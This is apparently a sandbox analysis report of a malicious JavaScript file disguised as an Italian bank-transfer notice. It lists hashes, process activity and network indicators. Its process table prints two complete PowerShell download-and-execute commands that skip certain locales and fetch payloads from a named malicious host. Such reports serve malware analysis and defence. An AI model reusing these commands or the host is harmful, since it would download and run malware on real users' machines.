File name: | 2019 0711-Eseguito_Bonifico_Europeo_Unico_0000_11075 xm.js |
Full analysis: | https://app.any.run/tasks/1adee127-4349-4867-bb35-1beed695fdb8 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 14:36:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF, LF line terminators |
MD5: | 467A15BBBD84943DD7035DF856EE5F07 |
SHA1: | 64BA2288C6807AA3FDCFB67017A98A7C5903840E |
SHA256: | BA03B218B8D79A8670928F207D43C5AD6EB61619AB328F94404C176CD2D13863 |
SSDEEP: | 96:IAe/Kcjr1RpxSc+uu27qG9galQpehaHyscYuOpZJY/3k5At05hG0xkhZmauTZy:GCcjr3pxR+A7qG96yxaZC/KAtXhSTZy |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2936 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\2019 0711-Eseguito_Bonifico_Europeo_Unico_0000_11075 xm.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
4060 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $cvswesib = [System.IO.Path]::GetTempPath() + '\SearchI32.js'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/502?ijwyujfdawybbwxaaisjvxgj',$cvswesib); Start-Process $cvswesib; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2184 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $jwciad = [System.IO.Path]::GetTempPath() +'\..' +'\' + 'Dropbo.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/501?vjswiccxcagi',$jwciad); Start-Process $jwciad; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W4T65QZLK6AN907PY2N5.temp | — | |
MD5:— | SHA256:— | |||
2184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\42831HSOFOSCBZ1WL60H.temp | — | |
MD5:— | SHA256:— | |||
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF100784.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1007a3.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2184 | powershell.exe | 31.214.157.69:80 | cloud.kokoheadattorney.com | easystores GmbH | NL | suspicious |
4060 | powershell.exe | 31.214.157.69:80 | cloud.kokoheadattorney.com | easystores GmbH | NL | suspicious |
Domain | IP | Reputation |
---|---|---|
cloud.kokoheadattorney.com |
| malicious |
dns.msftncsi.com |
| shared |